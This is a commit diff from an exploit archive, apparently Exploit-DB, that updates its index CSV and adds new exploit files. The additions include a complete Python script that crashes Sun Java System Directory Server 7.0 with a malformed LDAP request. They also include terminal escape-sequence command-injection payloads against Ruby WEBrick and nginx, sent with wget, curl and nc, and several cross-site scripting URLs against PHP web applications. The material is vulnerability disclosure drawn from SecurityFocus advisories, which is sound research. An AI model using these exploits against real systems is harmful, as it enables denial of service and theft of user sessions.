Updated 05_25_2014

2014-05-25 04:36:27 +00:00 · 2014-05-25 04:36:27 +00:00 · 4d0e8ffd90
commit 4d0e8ffd90
parent d9c7bc59db
10 changed files with 230 additions and 2 deletions
--- a/files.csv
+++ b/files.csv
@ -15905,7 +15905,7 @@ id,file,description,date,author,platform,type,port
 18405,platforms/asp/webapps/18405.txt,"ARYADAD Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",asp,webapps,0
 18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 WordPress Menu Plugin Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0
 18410,platforms/php/webapps/18410.txt,"miniCMS 1.0 & 2.0 - PHP Code Inject",2012-01-22,Or4nG.M4N,php,webapps,0
-18411,platforms/linux/local/18411.c,"Mempodipper - Linux Local Root => 2.6.39 (32-bit & 64-bit)",2012-01-23,zx2c4,linux,local,0
+18411,platforms/linux/local/18411.c,"Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper",2012-01-23,zx2c4,linux,local,0
 18412,platforms/php/webapps/18412.php,"Wordpress Kish Guest Posting Plugin 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0
 18413,platforms/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection Vulnerability",2012-01-23,Vulnerability-Lab,php,webapps,0
 18416,platforms/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps,0
@ -26995,7 +26995,7 @@ id,file,description,date,author,platform,type,port
 30082,platforms/php/webapps/30082.txt,"GNUTurk Mods.PHP Cross Site Scripting Vulnerability",2007-05-25,vagrant,php,webapps,0
 30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 (mod_notification) Stored Cross-Site Scripting Vulnerability",2013-12-06,LiquidWorm,php,webapps,0
 30084,platforms/php/webapps/30084.php,"Wordpress page-flip-image-gallery plugins Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0
-30085,platforms/linux/webapps/30085.txt,"Zimbra - 0day exploit / Privilegie escalation via LFI",2013-12-06,rubina119,linux,webapps,0
+30085,platforms/linux/webapps/30085.txt,"Zimbra - Privilegie Escalation via LFI (0day)",2013-12-06,rubina119,linux,webapps,0
 30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 Index.PHP Cross Site Scripting Vulnerability",2007-05-25,newbinaryfile,php,webapps,0
 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0
 30088,platforms/php/webapps/30088.txt,"Pligg 9.5 Reset Forgotten Password Security Bypass Vulnerability",2007-05-25,"242th section",php,webapps,0
@ -30165,3 +30165,12 @@ id,file,description,date,author,platform,type,port
 33479,platforms/osx/dos/33479.c,"Mac OS X 10.x 'libc/strtod(3)' Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0
 33480,platforms/linux/dos/33480.txt,"MATLAB  R2009b 'dtoa' Implementation Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0
 33481,platforms/asp/webapps/33481.txt,"DevWorx BlogWorx 1.0 'forum.asp' Cross Site Scripting Vulnerability",2010-01-09,Cyber_945,asp,webapps,0
+33482,platforms/php/webapps/33482.txt,"DigitalHive 'mt' Parameter Cross Site Scripting Vulnerability",2010-01-10,"ViRuSMaN ",php,webapps,0
+33483,platforms/multiple/dos/33483.py,"Sun Java System Directory Server 7.0 'core_get_proxyauth_dn' Denial of Service Vulnerability",2010-01-10,Intevydis,multiple,dos,0
+33484,platforms/php/webapps/33484.txt,"DeltaScripts PHP Links 1.0 'email' Parameter Cross Site Scripting Vulnerability",2010-01-11,Crux,php,webapps,0
+33485,platforms/php/webapps/33485.txt,"Jamit Job Board 'post_id' Parameter Cross Site Scripting Vulnerability",2010-01-11,Crux,php,webapps,0
+33486,platforms/php/webapps/33486.txt,"@lex Guestbook 5.0 Multiple Cross Site Scripting Vulnerabilities",2010-01-11,"D3V!L FUCKER",php,webapps,0
+33487,platforms/php/webapps/33487.txt,"PhPepperShop 2.5 'USER_ARTIKEL_HANDLING_AUFRUF.php' Cross-Site Scripting Vulnerability",2010-01-12,Crux,php,webapps,0
+33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 '$_SERVER['PHP_SELF']' Variable Multiple Cross Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0
+33489,platforms/multiple/remote/33489.txt,"Ruby <= 1.9.1 WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
+33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
--- a/platforms/multiple/dos/33483.py
+++ b/platforms/multiple/dos/33483.py
@ -0,0 +1,133 @@
+source: http://www.securityfocus.com/bid/37699/info
+
+Sun Java System Directory Server is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the effected application, denying service to legitimate users.
+
+Directory Server 7.0 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/env python
+# sun_dsee7.py
+#
+# Use this code at your own risk. Never run it against a production system.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+import socket
+import sys
+
+"""
+Sun Directory Server 7.0 core_get_proxyauth_dn() DoS (null ptr dereference)
+Tested on SUSE Linux Enterprise Server 11 
+
+# dsadm -V
+[dsadm]
+dsadm               : 7.0                  B2009.1104.2350 ZIP
+
+Copyright 2009 Sun Microsystems, Inc. All Rights Reserved.
+SUN PROPRIETARY/CONFIDENTIAL.
+Use is subject to license terms.
+
+[slapd 32-bit]
+Sun Microsystems, Inc.
+Sun-Directory-Server/7.0 B2009.1104.2350 32-bit
+ns-slapd            : 7.0                  B2009.1104.2350 ZIP
+Slapd Library       : 7.0                  B2009.1104.2350
+Front-End Library   : 7.0                  B2009.1104.2350
+
+This simple proof of concept code will crash ns-slapd daemon:
+
+Attaching to process 10204
+Reading symbols from /opt/sun/dsee7/lib/ns-slapd...(no debugging symbols found)...done.
+Reading symbols from /lib/libpthread.so.0...(no debugging symbols found)...done.
+...
+Program received signal SIGSEGV, Segmentation fault.
+[Switching to Thread 0xb1b47b90 (LWP 10233)]
+0xb80098c4 in core_get_proxyauth_dn () from /opt/sun/dsee7/lib/libslapd.so
+(gdb) bt
+#0  0xb80098c4 in core_get_proxyauth_dn () from /opt/sun/dsee7/lib/libslapd.so
+#1  0xb7ff30d3 in common_core_set_pb () from /opt/sun/dsee7/lib/libslapd.so
+#2  0xb7f1c7eb in search_core_set_pb () from /opt/sun/dsee7/lib/libfe.so
+#3  0xb7f2667f in ldap_decode_search () from /opt/sun/dsee7/lib/libfe.so
+#4  0xb7f27993 in ldap_parse_request () from /opt/sun/dsee7/lib/libfe.so
+#5  0xb7f147a4 in process_ldap_operation_using_core_api () from /opt/sun/dsee7/lib/libfe.so
+#6  0xb7f149ba in ldap_frontend_main_using_core_api () from /opt/sun/dsee7/lib/libfe.so
+#7  0xb7f153e3 in generic_workerthreadmain () from /opt/sun/dsee7/lib/libfe.so
+#8  0xb7eec89e in _pt_root () from /opt/sun/dsee7/lib/../lib/private/libnspr4.so
+#9  0xb80481b5 in start_thread () from /lib/libpthread.so.0
+#10 0xb7ccb3be in clone () from /lib/libc.so.6
+(gdb) x/i $eip
+0xb80098c4 :	cmpb   $0x4,(%eax)
+(gdb) i r eax
+eax            0x0	0
+(gdb) 
+
+"""
+
+def send_req(host,port):
+	"""
+LDAP Message, Search Request
+        Message Id: 1
+        Message Type: Search Request (0x03)
+        Message Length: 270
+        Base DN: (null)
+        Scope: Subtree (0x02)
+        Dereference: Never (0x00)
+        Size Limit: 0
+        Time Limit: 0
+        Attributes Only: False
+        Filter: (objectClass=*)
+        Attribute: (null)
+        LDAP Controls
+            LDAP Control
+                Control OID: 2.16.840.1.113730.3.4.18
+                Control Critical: True
+            ERROR: Couldn't parse LDAP Control: Wrong type for that item
+        """
+
+       	reqdump="""
+	30 82 01 15 02 01 01 63 82 01 0e 04 00 0a 01 02
+        0a 01 00 02 01 00 02 01 00 01 01 00 87 0b 6f 62
+        6a 65 63 74 43 6c 61 73 73 30 02 04 00 a0 81 e9
+        30 81 e6 04 18 32 2e 31 36 2e 38 34 30 2e 31 2e
+        31 31 33 37 33 30 2e 33 2e 34 2e 31 38 01 01 01
+        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
+        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
+        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
+        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
+        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
+        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
+        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
+        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
+        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
+        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
+        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
+        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
+        01 01 01 01 01 01 00 04 00
+	"""
+
+	buf = ""
+	for i in filter(lambda x: len(x.strip())>0, reqdump.split(" ")):
+		buf+=chr(int(i,16))
+
+	print "Sending req to %s:%d" % (host,port)
+
+	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	sock.connect((host,port))
+	sock.sendall(buf)
+	sock.close()
+
+	print "Done"
+
+if __name__=="__main__":
+	if len(sys.argv)<3:
+		print "usage: %s host port" % sys.argv[0]
+		sys.exit()
+
+	send_req(sys.argv[1],int(sys.argv[2]))
--- a/platforms/multiple/remote/33489.txt
+++ b/platforms/multiple/remote/33489.txt
@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/37710/info
+
+
+Ruby WEBrick is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in log files.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+Versions *prior to* the following are affected:
+
+Ruby 1.8.6 patchlevel 388
+Ruby 1.8.7 patchlevel 249
+Ruby 1.9.1 patchlevel 378 
+
+The following example is available:
+
+% xterm -e ruby -rwebrick -e 'WEBrick::HTTPServer.new(:Port=>8080).start' &
+% wget http://www.example.com:8080/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
+
--- a/platforms/multiple/remote/33490.txt
+++ b/platforms/multiple/remote/33490.txt
@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/37711/info
+
+The 'nginx' program is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in log files.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+This issue affects nginx 0.7.64; other versions may also be affected.
+
+The following examples are available:
+
+curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
+
+echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
+nc localhost 80 < payload
+
+
--- a/platforms/php/webapps/33482.txt
+++ b/platforms/php/webapps/33482.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37697/info
+
+DigitalHive is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/base.php?page=membres.php&mt=[Xss Vuln] 
--- a/platforms/php/webapps/33484.txt
+++ b/platforms/php/webapps/33484.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37700/info
+
+DeltaScripts PHP Links is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+DeltaScripts PHP Links 1.0 is vulnerable; other versions may be affected as well. 
+
+http://www.example.com/phplinks/login.php?email=%F6"+onmouseover=prompt(31337)//&submit=Login&forgotten=1
--- a/platforms/php/webapps/33485.txt
+++ b/platforms/php/webapps/33485.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37701/info
+
+Jamit Job Board is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/jobs/index.php?type=111-222-1933email@address.tst&mode=view&pin_x=0&pin_y=0&post_id=1>">
--- a/platforms/php/webapps/33486.txt
+++ b/platforms/php/webapps/33486.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/37706/info
+
+@lex Guestbook is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+@lex Guestbook 5.0.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?lang=english&skin=&debut=0&seeAdd=1&seeNotes=&seeMess=[XSS-Vuln]
+
--- a/platforms/php/webapps/33487.txt
+++ b/platforms/php/webapps/33487.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/37707/info
+
+PhPepperShop is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+PhPepperShop 2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971
+ 
--- a/platforms/php/webapps/33488.txt
+++ b/platforms/php/webapps/33488.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37709/info
+
+Active Calendar is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Active Calendar 1.2.0 is vulnerable; other versions (or products that include Active Calendar) may also be affected. 
+
+http://www.example.com/test.php/"><script>document.body.innerHTML=&#039;XSS&#039;;</script>